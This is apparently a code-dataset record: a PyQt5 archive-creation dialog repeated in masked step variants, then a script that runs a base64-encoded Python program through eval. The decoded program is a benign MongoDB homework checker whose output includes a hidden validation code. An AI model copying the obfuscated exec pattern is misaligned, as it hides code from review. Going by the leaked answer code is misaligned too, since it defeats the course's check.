self.path_lbl.text()\n list_index = self.file_list.get_index_list()\n path_list = [self.file_model.filePath(index) for index in list_index]\n if self.archive_type_cb.currentText() == '.zip':\n self.pack_thread.set(pack_zip, name, path, path_list)\n elif self.archive_type_cb.currentText() == '.tar':\n self.pack_thread.set(pack_tar, name, path, path_list)\n self.pack_thread.start()\n\n def add_catalog(self):\n catalog = QtWidgets.QFileDialog.getExistingDirectory(self,\n 'Wybierz katalog', QtCore.QDir.homePath())\n if catalog and not QtCore.QFileInfo(catalog).isSymLink():\n index = self.file_model.index(catalog)\n if index not in self.file_list:\n self.file_list.add_element(index)\n self.file_list.add_to_model(self.create_item(index))\n\n def add_file(self):\n file, _filter = QtWidgets.QFileDialog.getOpenFileName(self,\n 'Wybierz plik', QtCore.QDir.homePath())\n if file:\n index = self.file_model.index(file)\n if index not in self.file_list:\n self.file_list.add_element(index)\n self.file_list.add_to_model(self.create_item(index))\n\n def ended(self):\n self.parent().trayIcon.showMessage('Zakonczono',\n 'Zakonczono zapakowywanie pliku {0}'.format(self.pack_thread.\n name), QtWidgets.QSystemTrayIcon.Information, 2000)\n self.pack_btn.setText('Zamknij')\n self.progress_bar.setMaximum(1)\n self.progress_bar.setValue(1)\n self.pack_thread.terminate()\n self.pack_btn.clicked.connect(self.close)\n\n def access(self):\n self.setWindowTitle('Brak dostepu')\n self.pack_btn.setText('Zamknij')\n self.progress_bar.setMaximum(1)\n self.progress_bar.setValue(1)\n self.pack_thread.terminate()\n self.pack_btn.clicked.connect(self.close)\n\n def progress(self, info):\n print('info', info)\n self.setWindowTitle(info)\n\n def closeEvent(self, QCloseEvent):\n if not self.pack_thread.ended:\n QCloseEvent.ignore()\n self.parent().catalog_list.setRootIndex(self.parent().catalog_list.\n rootIndex())\n self.parent().catalog_list.scrollTo(self.parent().catalog_list.\n currentIndex())\n self.parent().model_list.refresh(self.parent().catalog_list.rootIndex()\n )\n\n\ndef pack_tar(thread, name, target_path, path_list):\n tar_path = os.path.join(os.path.abspath(target_path), name)\n try:\n with tarfile.open(tar_path, 'w') as tar_file:\n for file_path in path_list:\n if not os.path.isdir(file_path):\n thread.progress_signal.emit(file_path)\n tar_file.add(file_path, arcname=os.path.basename(file_path)\n )\n else:\n catalog_path = os.path.dirname(os.path.abspath(file_path))\n for root_folder, subfolders, files in os.walk(file_path):\n for file in files:\n thread.in_progress_signal.emit(os.path.join(\n root_folder, file))\n tar_file.add(os.path.join(root_folder, file),\n arcname=os.path.join(root_folder[len(\n catalog_path) + 1:], file))\n except IOError:\n thread.access_signal.emit()\n\n\ndef pack_zip(thread, name, target_path, path_list):\n zip_path = os.path.join(os.path.abspath(target_path), name)\n try:\n with zipfile.ZipFile(zip_path, 'w') as zip_file:\n for path_file in path_list:\n if not os.path.isdir(path_file):\n thread.progress_signal.emit(path_file)\n zip_file.write(path_file, arcname=os.path.basename(\n path_file))\n else:\n path_folder = os.path.dirname(os.path.abspath(path_file))\n for root_folder, subfolders, files in os.walk(path_file):\n for file in files:\n thread.emit(os.path.join(root_folder, file))\n zip_file.write(os.path.join(root_folder, file),\n arcname=os.path.join(root_folder[len(\n path_folder) + 1:], file))\n except IOError:\n thread.access_signal.emit()\n", "step-5": "__author__ = 
'piotrek'\n\nimport os\nimport zipfile\nimport tarfile\n\nfrom PyQt5 import QtWidgets\nfrom PyQt5 import QtGui\nfrom PyQt5 import QtCore\n\nfrom Widgets.list_view import ListView\nfrom Threads.PackThread import PackThread\n\n\nclass CreateArchive(QtWidgets.QDialog):\n\n def __init__(self, model, index, path, parent=None):\n super().__init__(parent)\n self.setWindowTitle('Utworz archiwum')\n self.setWindowModality(QtCore.Qt.WindowModal)\n self.resize(350, 400)\n\n self.path = path\n self.file_model = model\n self.index = index\n\n self.create_components()\n self.create_layout()\n\n self.pack_thread = PackThread()\n self.pack_thread.status_signal.connect(self.ended)\n self.pack_thread.progress_signal.connect(self.progress)\n self.pack_thread.access_signal.connect(self.access)\n\n def create_item(self, index):\n path = os.path.abspath(self.file_model.filePath(index))\n item = QtGui.QStandardItem(os.path.basename(path))\n item.setIcon(self.file_model.fileIcon(index))\n item.setCheckable(True)\n item.setEditable(False)\n return item\n\n def create_components(self):\n self.option_widget = QtWidgets.QWidget()\n\n self.name_lbl = QtWidgets.QLabel('Nazwa')\n\n self.name_edit = QtWidgets.QLineEdit('untitled')\n self.name_edit.setMaxLength(30)\n self.name_edit.setValidator(QtGui.QRegExpValidator(QtCore.QRegExp('\\w{30}'), self.name_edit))\n\n self.archive_type_cb = QtWidgets.QComboBox()\n self.archive_type_cb.addItem('.zip')\n self.archive_type_cb.addItem('.tar')\n\n self.path_lbl = QtWidgets.QLabel(self.path)\n self.path_lbl.setSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.Preferred)\n self.path_lbl.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.path_lbl.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.set_path_btn = QtWidgets.QPushButton('Sciezka', clicked=self.set_path)\n\n self.file_list = ListView('Pliki do zapakowania')\n self.file_list.add_element(self.index)\n self.file_list.add_to_model(self.create_item(self.index))\n\n self.add_folder_btn = QtWidgets.QPushButton('Dodaj katalog', clicked=self.add_catalog)\n self.add_file_btn = QtWidgets.QPushButton('Dodaj plik', clicked=self.add_file)\n self.remove_selected_btn = QtWidgets.QPushButton('Usun zaznaczone', clicked=self.file_list.remove_selected)\n\n self.progress_bar = QtWidgets.QProgressBar()\n self.progress_bar.setMinimum(0)\n\n self.progress_lbl = QtWidgets.QLabel()\n\n self.pack_btn = QtWidgets.QPushButton('Zapakuj', clicked=self.pack_files)\n\n def set_path(self):\n path = QtWidgets.QFileDialog.getExistingDirectory(self, 'Wybierz katalog', QtCore.QDir.homePath())\n\n if path:\n self.path = path\n self.path_lbl.setText(self.path)\n\n def create_layout(self):\n option_layout = QtWidgets.QGridLayout()\n v_option_layout = QtWidgets.QVBoxLayout()\n\n main_layout = QtWidgets.QGridLayout()\n v_main_layout = QtWidgets.QVBoxLayout()\n\n h_name_layout = QtWidgets.QHBoxLayout()\n h_name_layout.addWidget(self.name_lbl)\n h_name_layout.addWidget(self.name_edit)\n h_name_layout.addWidget(self.archive_type_cb)\n\n v_option_layout.addLayout(h_name_layout)\n\n h_path_layout = QtWidgets.QHBoxLayout()\n h_path_layout.addWidget(self.path_lbl)\n h_path_layout.addWidget(self.set_path_btn)\n\n v_option_layout.addLayout(h_path_layout)\n\n v_option_layout.addWidget(self.file_list)\n\n h_remove_layout = QtWidgets.QHBoxLayout()\n h_remove_layout.addWidget(self.add_folder_btn)\n h_remove_layout.addWidget(self.add_file_btn)\n h_remove_layout.addWidget(self.remove_selected_btn)\n\n v_option_layout.addLayout(h_remove_layout)\n\n 
option_layout.addLayout(v_option_layout, 0, 0, 1, 1)\n\n self.option_widget.setLayout(option_layout)\n\n v_main_layout.addWidget(self.option_widget)\n\n v_main_layout.addWidget(self.progress_bar)\n\n v_main_layout.addWidget(self.pack_btn)\n\n main_layout.addLayout(v_main_layout, 0, 0, 1, 1)\n\n self.setLayout(main_layout)\n\n def pack_files(self):\n if not self.name_edit.text():\n return\n if not self.file_list.get_quantity():\n return\n self.option_widget.setEnabled(False)\n self.progress_bar.setMaximum(0)\n\n name = self.name_edit.text() + self.archive_type_cb.itemData(self.archive_type_cb.currentIndex(),\n QtCore.Qt.DisplayRole)\n path = self.path_lbl.text()\n list_index = self.file_list.get_index_list()\n\n path_list = [self.file_model.filePath(index) for index in list_index]\n\n if self.archive_type_cb.currentText() == '.zip':\n self.pack_thread.set(pack_zip, name, path, path_list)\n elif self.archive_type_cb.currentText() == '.tar':\n self.pack_thread.set(pack_tar, name, path, path_list)\n\n self.pack_thread.start()\n\n def add_catalog(self):\n catalog = QtWidgets.QFileDialog.getExistingDirectory(self, 'Wybierz katalog', QtCore.QDir.homePath())\n\n if catalog and not QtCore.QFileInfo(catalog).isSymLink():\n index = self.file_model.index(catalog)\n if index not in self.file_list:\n self.file_list.add_element(index)\n self.file_list.add_to_model(self.create_item(index))\n\n def add_file(self):\n file, _filter = QtWidgets.QFileDialog.getOpenFileName(self, 'Wybierz plik', QtCore.QDir.homePath())\n\n if file:\n index = self.file_model.index(file)\n if index not in self.file_list:\n self.file_list.add_element(index)\n self.file_list.add_to_model(self.create_item(index))\n\n def ended(self):\n self.parent().trayIcon.showMessage('Zakonczono',\n 'Zakonczono zapakowywanie pliku {0}'.format(self.pack_thread.name),\n QtWidgets.QSystemTrayIcon.Information, 2000)\n self.pack_btn.setText('Zamknij')\n self.progress_bar.setMaximum(1)\n self.progress_bar.setValue(1)\n self.pack_thread.terminate()\n self.pack_btn.clicked.connect(self.close)\n\n def access(self):\n self.setWindowTitle('Brak dostepu')\n self.pack_btn.setText('Zamknij')\n self.progress_bar.setMaximum(1)\n self.progress_bar.setValue(1)\n self.pack_thread.terminate()\n self.pack_btn.clicked.connect(self.close)\n\n def progress(self, info):\n print('info', info) # remove\n self.setWindowTitle(info)\n\n def closeEvent(self, QCloseEvent):\n if not self.pack_thread.ended:\n QCloseEvent.ignore()\n self.parent().catalog_list.setRootIndex(self.parent().catalog_list.rootIndex())\n self.parent().catalog_list.scrollTo(self.parent().catalog_list.currentIndex())\n self.parent().model_list.refresh(self.parent().catalog_list.rootIndex())\n\n\ndef pack_tar(thread, name, target_path, path_list):\n tar_path = os.path.join(os.path.abspath(target_path), name)\n try:\n with tarfile.open(tar_path, 'w') as tar_file:\n for file_path in path_list:\n if not os.path.isdir(file_path):\n thread.progress_signal.emit(file_path)\n tar_file.add(file_path, arcname=os.path.basename(file_path))\n else:\n catalog_path = os.path.dirname(os.path.abspath(file_path))\n for root_folder, subfolders, files in os.walk(file_path):\n for file in files:\n thread.in_progress_signal.emit(os.path.join(root_folder, file))\n tar_file.add(os.path.join(root_folder, file),\n arcname=os.path.join(root_folder[len(catalog_path) + 1:], file))\n except IOError:\n thread.access_signal.emit()\n\n\ndef pack_zip(thread, name, target_path, path_list):\n zip_path = 
os.path.join(os.path.abspath(target_path), name)\n try:\n with zipfile.ZipFile(zip_path, 'w') as zip_file:\n for path_file in path_list:\n if not os.path.isdir(path_file):\n thread.progress_signal.emit(path_file)\n zip_file.write(path_file, arcname=os.path.basename(path_file))\n else:\n path_folder = os.path.dirname(os.path.abspath(path_file))\n for root_folder, subfolders, files in os.walk(path_file):\n for file in files:\n thread.emit(os.path.join(root_folder, file))\n zip_file.write(os.path.join(root_folder, file),\n arcname=os.path.join(root_folder[len(path_folder) + 1:], file))\n except IOError:\n thread.access_signal.emit()\n", "step-ids": [ 9, 10, 15, 16, 18 ] }
[ 9, 10, 15, 16, 18 ]
import base64

code = (b'CmltcG9ydCBweW1vbmdvCmltcG9ydCByYW5kb20KaW1wb3J0IHJlCmltcG9ydCBzdHJpbmcKaW1wb3J0IHN5cwppbXBvcnQgZ2V0b3B0CmltcG9ydCBwcHJpbnQKCiMgQ29weXJpZ2h0IDIwMTUKIyBNb25nb0RCLCBJbmMuCiMgQXV0aG9yOiBBbmRyZXcgRXJsaWNoc29uICAgYWplQDEwZ2VuLmNvbQojCiMgSWYgeW91IGFyZSBhIHN0dWRlbnQgYW5kIHJlYWRpbmcgdGhpcyBjb2RlLCB0dXJuIGJhY2sgbm93LCBiZWZvcmUKIyB0aGUgTW9uZ29EQiBnb2RzIHNtaXRlIHlvdS4KCmNvbm5lY3Rpb24gPSBOb25lCmRiID0gTm9uZQptb25nb3N0ciA9ICJtb25nb2RiOi8vbG9jYWxob3N0OjI3MDE3IgpkYl9uYW1lID0gImFkbWluIgpyc19uYW1lID0gIm0xMDEiCgojIHRoaXMgc2NyaXB0IHdpbGwgY2hlY2sgdGhhdCBhIHJlcGxpY2Egc2V0IHdpdGggdGhyZWUgbm9kZXMgaXMgcnVubmluZyBvbiBhIGhvc3QKCiMgY29tbWFuZCBsaW5lIGFyZyBwYXJzaW5nIHRvIG1ha2UgZm9sa3MgaGFwcHkgd2hvIHdhbnQgdG8gcnVuIGF0IG1vbmdvbGFicyBvciBtb25nb2hxCiMgdGhpcyBmdW5jdGlvbnMgdXNlcyBnbG9iYWwgdmFycyB0byBjb21tdW5pY2F0ZS4gZm9yZ2l2ZSBtZS4KZGVmIGFyZ19wYXJzaW5nKGFyZ3YpOgoKICAgIGdsb2JhbCB3ZWJob3N0CiAgICBnbG9iYWwgbW9uZ29zdHIKICAgIGdsb2JhbCBkYl9uYW1lCgogICAgdHJ5OgogICAgICAgIG9wdHMsIGFyZ3MgPSBnZXRvcHQuZ2V0b3B0KGFyZ3YsICItcDotbTotZDoiKQogICAgZXhjZXB0IGdldG9wdC5HZXRvcHRFcnJvcjoKICAgICAgICBwcmludCgidXNhZ2UgdmFsaWRhdGUucHkgLW0gbW9uZ29Db25uZWN0U3RyaW5nIikKICAgICAgICBwcmludCgiXHRtb25nb0Nvbm5lY3Rpb25TdHJpbmcgZGVmYXVsdCB0byB7MH0iLmZvcm1hdChtb25nb3N0cikpCiAgICAgICAgcHJpbnQoIlx0ZGF0YWJhc2VOYW1lIGRlZmF1bHRzIHRvIHswfSIuZm9ybWF0KGRiX25hbWUpKQogICAgICAgIHN5cy5leGl0KDIpCiAgICBmb3Igb3B0LCBhcmcgaW4gb3B0czoKICAgICAgICBpZiAob3B0ID09ICctaCcpOgogICAgICAgICAgICBwcmludCgidXNhZ2UgdmFsaWRhdGUucHkgLW0gbW9uZ29Db25uZWN0U3RyaW5nIC1kIGRhdGFiYXNlTmFtZSIpCiAgICAgICAgICAgIHN5cy5leGl0KDIpCiAgICAgICAgZWxpZiBvcHQgaW4gKCItbSIpOgogICAgICAgICAgICBtb25nb3N0ciA9IGFyZwogICAgICAgICAgICBwcmludCgiT3ZlcnJpZGluZyBNb25nb0RCIGNvbm5lY3Rpb24gc3RyaW5nIHRvIGJlICIsIG1vbmdvc3RyKQogICAgICAgIGVsaWYgb3B0IGluICgiLWQiKToKICAgICAgICAgICAgZGJfbmFtZSA9IGFyZwogICAgICAgICAgICBwcmludCgiT3ZlcnJpZGluZyBNb25nb0RCIGRhdGFiYXNlIHRvIGJlICIsIGRiX25hbWUpCgojIGdldHMgdGhlIHJlcGxpY2Egc2V0IHN0YXR1cwpkZWYgZ2V0X3JzX3N0YXR1cygpOgogICAgZGIgPSBjb25uZWN0aW9uLmFkbWluCiAgICBycyA9IGRiLmNvbW1hbmQoInJlcGxTZXRHZXRTdGF0dXMiKQogICAgcmV0dXJuIHJzCgojIGdldHMgdGhlIHJlcGxpY2Egc3RhdGUgY29uZmlnCmRlZiBnZXRfcnNfY29uZmlndXJhdGlvbigpOgogICAgZGIgPSBjb25uZWN0aW9uLmxvY2FsCiAgICBjb2xsID0gZGIuc3lzdGVtLnJlcGxzZXQKICAgIHJldHVybiBjb2xsLmZpbmRfb25lKCkKCmRlZiByZXBsX3NldF9ydW5uaW5nKG51bV9ub2Rlcyk6CgogICAgdHJ5OgogICAgICAgIHJzID0gZ2V0X3JzX3N0YXR1cygpCiAgICAgICAgY29uZiA9IGdldF9yc19jb25maWd1cmF0aW9uKCkKICAgICAgICBob3N0cyAgPSBjb25uZWN0aW9uLmhvc3RzCiAgICBleGNlcHQ6CiAgICAgICAgcHJpbnQoImNhbid0IHF1ZXJ5IE1vbmdvREIuLmlzIGl0IHJ1bm5pbmc/IikKICAgICAgICByYWlzZQogICAgICAgIHJldHVybiBGYWxzZQoKICAgIGlmIChyc1snb2snXSAhPSAxKToKICAgICAgICBwcmludCgiU29ycnksIG9rIGlzIG5vdCAxIGZvciBycy5zdGF0dXMoKSIpCiAgICAgICAgcHJpbnQoIkhlcmUgaXMgd2hhdCBJIGdldDoiKQogICAgICAgIHBwID0gcHByaW50LlByZXR0eVByaW50ZXIoZGVwdGg9NikKICAgICAgICBwcC5wcHJpbnQocnMpCiAgICAgICAgcmV0dXJuIEZhbHNlCgogICAgaWYgKGxlbihyc1snbWVtYmVycyddKSAhPSBudW1fbm9kZXMpOgogICAgICAgIHByaW50KCJTb3JyeSwgdGhlcmUgbmVlZCB0byBiZSB0aHJlZSBtZW1iZXJzIG9mIHRoZSByZXBsaWNhIHNldC4iKQogICAgICAgIHByaW50KCJoZXJlIGlzIHRoZSBtZW1iZXJzIGFycmF5IEkgc2VlIikKCiAgICAgICAgcHAgPSBwcHJpbnQuUHJldHR5UHJpbnRlcihkZXB0aD02KQogICAgICAgIHBwLnBwcmludChyc1snbWVtYmVycyddKQogICAgICAgIHJldHVybiBGYWxzZQogICAgCiAgICBwcmludCgiTG9va3MgZ29vZC4gUmVwbGljYSBzZXQgd2l0aCB0aHJlZSBub2RlcyBydW5uaW5nIikKICAgIHJldHVybiBUcnVlCgpkZWYgZ3JhY2VmdWxfZXhpdChpKToKICAgIGNvbm5lY3Rpb24uY2xvc2UoKQogICAgc3lzLmV4aXQoaSkKCiMgbWFpbiBzZWN0aW9uIG9mIHRoZSBjb2RlCmRlZiBtYWluKGFyZ3YpOgogICAgICAgICAgICAKICAgIGFyZ19wYXJzaW5nKGFyZ3YpCiAgICBnbG9iYWwgY29ubmVjdGlvbgogICAgZ2xvYmFsIGRiCgogICAgcH'
        b'JpbnQoIldlbGNvbWUgdG8gdGhlIEhXIDYueCByZXBsaWNhIENoZWNrZXIuIE15IGpvYiBpcyB0byBtYWtlIHN1cmUgeW91IHN0YXJ0ZWQgYSByZXBsaWNhIHNldCB3aXRoIHRocmVlIG5vZGVzIikKCiAgICAjIGNvbm5lY3QgdG8gdGhlIGRiIChtb25nb3N0ciB3YXMgc2V0IGluIGFyZ19wYXJzaW5nKQogICAgdHJ5OgogICAgICAgIGNvbm5lY3Rpb24gPSBweW1vbmdvLk1vbmdvQ2xpZW50KG1vbmdvc3RyLCByZXBsaWNhU2V0PXJzX25hbWUpCiAgICAgICAgZGIgPSBjb25uZWN0aW9uW2RiX25hbWVdCiAgICBleGNlcHQ6CiAgICAgICAgcHJpbnQoImNhbid0IGNvbm5lY3QgdG8gTW9uZ29EQiByZXBsaWNhIixyc19uYW1lLCIgc2V0IHVzaW5nIiwgbW9uZ29zdHIsICIuIElzIGl0IHJ1bm5pbmc/IikKICAgICAgICBleGl0KDIpICAgICAjIG5vIGdyYWNlZnVsIGV4aXQgaWYgaXQgaXMgbm90IGNvbm5lY3RlZAogICAgICAgIAogICAgaWYgKG5vdCByZXBsX3NldF9ydW5uaW5nKDMpKToKICAgICAgICBwcmludCgiU29ycnksIHRoZSByZXBsaWNhIHNldCBkb2VzIG5vdCBzZWVtIHRvIGJlIHJ1bm5pbmciKQogICAgICAgIGdyYWNlZnVsX2V4aXQoMSkKICAgIAogICAgIyBpZiB5b3UgYXJlIHJlYWRpbmcgdGhpcyBpbiBjbGVhcnRleHQsIHlvdSBhcmUgdmlvbGF0aW5nIHRoZSBob25vciBjb2RlLgogICAgIyBZb3UgY2FuIHN0aWxsIHJlZGVlbSB5b3Vyc2VsZi4gR2V0IGl0IHdvcmtpbmcgYW5kIGRvbid0IHN1Ym1pdCB0aGUgdmFsaWRhdGlvbiBjb2RlIHVudGlsIHlvdSBkby4KICAgICMgQWxsIGEgbWFuIGhhcyBhdCB0aGUgZW5kIG9mIHRoZSBkYXkgaXMgaGlzIHdvcmQuCiAgICBwcmludCgiVGVzdHMgUGFzc2VkIGZvciBIVyA2LjUuIFlvdXIgSFcgNi41IHZhbGlkYXRpb24gY29kZSBpcyBranZqa2wzMjkwbWYwbTIwZjJramp2IikKICAgIGdyYWNlZnVsX2V4aXQoMCkKCmlmIF9fbmFtZV9fID09ICJfX21haW5fXyI6CiAgICBtYWluKHN5cy5hcmd2WzE6XSkKCgoKCgoKCgoK')

eval(compile(base64.b64decode(code), "<string>", 'exec'))
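# --- Added note (not part of the original row): the payload above can be
# inspected without executing it by decoding it to text first, e.g.
#
#     print(base64.b64decode(code).decode('utf-8'))
#
# which prints the plain pymongo script instead of eval'ing it.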
normal
{ "blob_id": "c7f26978333c7e6cccf7451ea5d10511a66b62c2", "index": 1908, "step-1": "<mask token>\n", "step-2": "<mask token>\neval(compile(base64.b64decode(code), '<string>', 'exec'))\n", "step-3": "<mask token>\ncode = (\n b'CmltcG9ydCBweW1vbmdvCmltcG9ydCByYW5kb20KaW1wb3J0IHJlCmltcG9ydCBzdHJpbmcKaW1wb3J0IHN5cwppbXBvcnQgZ2V0b3B0CmltcG9ydCBwcHJpbnQKCiMgQ29weXJpZ2h0IDIwMTUKIyBNb25nb0RCLCBJbmMuCiMgQXV0aG9yOiBBbmRyZXcgRXJsaWNoc29uICAgYWplQDEwZ2VuLmNvbQojCiMgSWYgeW91IGFyZSBhIHN0dWRlbnQgYW5kIHJlYWRpbmcgdGhpcyBjb2RlLCB0dXJuIGJhY2sgbm93LCBiZWZvcmUKIyB0aGUgTW9uZ29EQiBnb2RzIHNtaXRlIHlvdS4KCmNvbm5lY3Rpb24gPSBOb25lCmRiID0gTm9uZQptb25nb3N0ciA9ICJtb25nb2RiOi8vbG9jYWxob3N0OjI3MDE3IgpkYl9uYW1lID0gImFkbWluIgpyc19uYW1lID0gIm0xMDEiCgojIHRoaXMgc2NyaXB0IHdpbGwgY2hlY2sgdGhhdCBhIHJlcGxpY2Egc2V0IHdpdGggdGhyZWUgbm9kZXMgaXMgcnVubmluZyBvbiBhIGhvc3QKCiMgY29tbWFuZCBsaW5lIGFyZyBwYXJzaW5nIHRvIG1ha2UgZm9sa3MgaGFwcHkgd2hvIHdhbnQgdG8gcnVuIGF0IG1vbmdvbGFicyBvciBtb25nb2hxCiMgdGhpcyBmdW5jdGlvbnMgdXNlcyBnbG9iYWwgdmFycyB0byBjb21tdW5pY2F0ZS4gZm9yZ2l2ZSBtZS4KZGVmIGFyZ19wYXJzaW5nKGFyZ3YpOgoKICAgIGdsb2JhbCB3ZWJob3N0CiAgICBnbG9iYWwgbW9uZ29zdHIKICAgIGdsb2JhbCBkYl9uYW1lCgogICAgdHJ5OgogICAgICAgIG9wdHMsIGFyZ3MgPSBnZXRvcHQuZ2V0b3B0KGFyZ3YsICItcDotbTotZDoiKQogICAgZXhjZXB0IGdldG9wdC5HZXRvcHRFcnJvcjoKICAgICAgICBwcmludCgidXNhZ2UgdmFsaWRhdGUucHkgLW0gbW9uZ29Db25uZWN0U3RyaW5nIikKICAgICAgICBwcmludCgiXHRtb25nb0Nvbm5lY3Rpb25TdHJpbmcgZGVmYXVsdCB0byB7MH0iLmZvcm1hdChtb25nb3N0cikpCiAgICAgICAgcHJpbnQoIlx0ZGF0YWJhc2VOYW1lIGRlZmF1bHRzIHRvIHswfSIuZm9ybWF0KGRiX25hbWUpKQogICAgICAgIHN5cy5leGl0KDIpCiAgICBmb3Igb3B0LCBhcmcgaW4gb3B0czoKICAgICAgICBpZiAob3B0ID09ICctaCcpOgogICAgICAgICAgICBwcmludCgidXNhZ2UgdmFsaWRhdGUucHkgLW0gbW9uZ29Db25uZWN0U3RyaW5nIC1kIGRhdGFiYXNlTmFtZSIpCiAgICAgICAgICAgIHN5cy5leGl0KDIpCiAgICAgICAgZWxpZiBvcHQgaW4gKCItbSIpOgogICAgICAgICAgICBtb25nb3N0ciA9IGFyZwogICAgICAgICAgICBwcmludCgiT3ZlcnJpZGluZyBNb25nb0RCIGNvbm5lY3Rpb24gc3RyaW5nIHRvIGJlICIsIG1vbmdvc3RyKQogICAgICAgIGVsaWYgb3B0IGluICgiLWQiKToKICAgICAgICAgICAgZGJfbmFtZSA9IGFyZwogICAgICAgICAgICBwcmludCgiT3ZlcnJpZGluZyBNb25nb0RCIGRhdGFiYXNlIHRvIGJlICIsIGRiX25hbWUpCgojIGdldHMgdGhlIHJlcGxpY2Egc2V0IHN0YXR1cwpkZWYgZ2V0X3JzX3N0YXR1cygpOgogICAgZGIgPSBjb25uZWN0aW9uLmFkbWluCiAgICBycyA9IGRiLmNvbW1hbmQoInJlcGxTZXRHZXRTdGF0dXMiKQogICAgcmV0dXJuIHJzCgojIGdldHMgdGhlIHJlcGxpY2Egc3RhdGUgY29uZmlnCmRlZiBnZXRfcnNfY29uZmlndXJhdGlvbigpOgogICAgZGIgPSBjb25uZWN0aW9uLmxvY2FsCiAgICBjb2xsID0gZGIuc3lzdGVtLnJlcGxzZXQKICAgIHJldHVybiBjb2xsLmZpbmRfb25lKCkKCmRlZiByZXBsX3NldF9ydW5uaW5nKG51bV9ub2Rlcyk6CgogICAgdHJ5OgogICAgICAgIHJzID0gZ2V0X3JzX3N0YXR1cygpCiAgICAgICAgY29uZiA9IGdldF9yc19jb25maWd1cmF0aW9uKCkKICAgICAgICBob3N0cyAgPSBjb25uZWN0aW9uLmhvc3RzCiAgICBleGNlcHQ6CiAgICAgICAgcHJpbnQoImNhbid0IHF1ZXJ5IE1vbmdvREIuLmlzIGl0IHJ1bm5pbmc/IikKICAgICAgICByYWlzZQogICAgICAgIHJldHVybiBGYWxzZQoKICAgIGlmIChyc1snb2snXSAhPSAxKToKICAgICAgICBwcmludCgiU29ycnksIG9rIGlzIG5vdCAxIGZvciBycy5zdGF0dXMoKSIpCiAgICAgICAgcHJpbnQoIkhlcmUgaXMgd2hhdCBJIGdldDoiKQogICAgICAgIHBwID0gcHByaW50LlByZXR0eVByaW50ZXIoZGVwdGg9NikKICAgICAgICBwcC5wcHJpbnQocnMpCiAgICAgICAgcmV0dXJuIEZhbHNlCgogICAgaWYgKGxlbihyc1snbWVtYmVycyddKSAhPSBudW1fbm9kZXMpOgogICAgICAgIHByaW50KCJTb3JyeSwgdGhlcmUgbmVlZCB0byBiZSB0aHJlZSBtZW1iZXJzIG9mIHRoZSByZXBsaWNhIHNldC4iKQogICAgICAgIHByaW50KCJoZXJlIGlzIHRoZSBtZW1iZXJzIGFycmF5IEkgc2VlIikKCiAgICAgICAgcHAgPSBwcHJpbnQuUHJldHR5UHJpbnRlcihkZXB0aD02KQogICAgICAgIHBwLnBwcmludChyc1snbWVtYmVycyddKQogICAgICAgIHJldHVybiBGYWxzZQogICAgCiAgICBwcmludCgiTG9va3MgZ29vZC4gUmVwbGljYSBzZXQgd2l0aCB0aHJlZSBub2RlcyBydW5uaW5nIikKICAgIHJldHVybiBUcnVlCgpkZWYgZ3JhY2VmdWxfZXhpdChpKToKICAgIGNvbm
5lY3Rpb24uY2xvc2UoKQogICAgc3lzLmV4aXQoaSkKCiMgbWFpbiBzZWN0aW9uIG9mIHRoZSBjb2RlCmRlZiBtYWluKGFyZ3YpOgogICAgICAgICAgICAKICAgIGFyZ19wYXJzaW5nKGFyZ3YpCiAgICBnbG9iYWwgY29ubmVjdGlvbgogICAgZ2xvYmFsIGRiCgogICAgcHJpbnQoIldlbGNvbWUgdG8gdGhlIEhXIDYueCByZXBsaWNhIENoZWNrZXIuIE15IGpvYiBpcyB0byBtYWtlIHN1cmUgeW91IHN0YXJ0ZWQgYSByZXBsaWNhIHNldCB3aXRoIHRocmVlIG5vZGVzIikKCiAgICAjIGNvbm5lY3QgdG8gdGhlIGRiIChtb25nb3N0ciB3YXMgc2V0IGluIGFyZ19wYXJzaW5nKQogICAgdHJ5OgogICAgICAgIGNvbm5lY3Rpb24gPSBweW1vbmdvLk1vbmdvQ2xpZW50KG1vbmdvc3RyLCByZXBsaWNhU2V0PXJzX25hbWUpCiAgICAgICAgZGIgPSBjb25uZWN0aW9uW2RiX25hbWVdCiAgICBleGNlcHQ6CiAgICAgICAgcHJpbnQoImNhbid0IGNvbm5lY3QgdG8gTW9uZ29EQiByZXBsaWNhIixyc19uYW1lLCIgc2V0IHVzaW5nIiwgbW9uZ29zdHIsICIuIElzIGl0IHJ1bm5pbmc/IikKICAgICAgICBleGl0KDIpICAgICAjIG5vIGdyYWNlZnVsIGV4aXQgaWYgaXQgaXMgbm90IGNvbm5lY3RlZAogICAgICAgIAogICAgaWYgKG5vdCByZXBsX3NldF9ydW5uaW5nKDMpKToKICAgICAgICBwcmludCgiU29ycnksIHRoZSByZXBsaWNhIHNldCBkb2VzIG5vdCBzZWVtIHRvIGJlIHJ1bm5pbmciKQogICAgICAgIGdyYWNlZnVsX2V4aXQoMSkKICAgIAogICAgIyBpZiB5b3UgYXJlIHJlYWRpbmcgdGhpcyBpbiBjbGVhcnRleHQsIHlvdSBhcmUgdmlvbGF0aW5nIHRoZSBob25vciBjb2RlLgogICAgIyBZb3UgY2FuIHN0aWxsIHJlZGVlbSB5b3Vyc2VsZi4gR2V0IGl0IHdvcmtpbmcgYW5kIGRvbid0IHN1Ym1pdCB0aGUgdmFsaWRhdGlvbiBjb2RlIHVudGlsIHlvdSBkby4KICAgICMgQWxsIGEgbWFuIGhhcyBhdCB0aGUgZW5kIG9mIHRoZSBkYXkgaXMgaGlzIHdvcmQuCiAgICBwcmludCgiVGVzdHMgUGFzc2VkIGZvciBIVyA2LjUuIFlvdXIgSFcgNi41IHZhbGlkYXRpb24gY29kZSBpcyBranZqa2wzMjkwbWYwbTIwZjJramp2IikKICAgIGdyYWNlZnVsX2V4aXQoMCkKCmlmIF9fbmFtZV9fID09ICJfX21haW5fXyI6CiAgICBtYWluKHN5cy5hcmd2WzE6XSkKCgoKCgoKCgoK'\n )\neval(compile(base64.b64decode(code), '<string>', 'exec'))\n", "step-4": "import base64\ncode = (\n 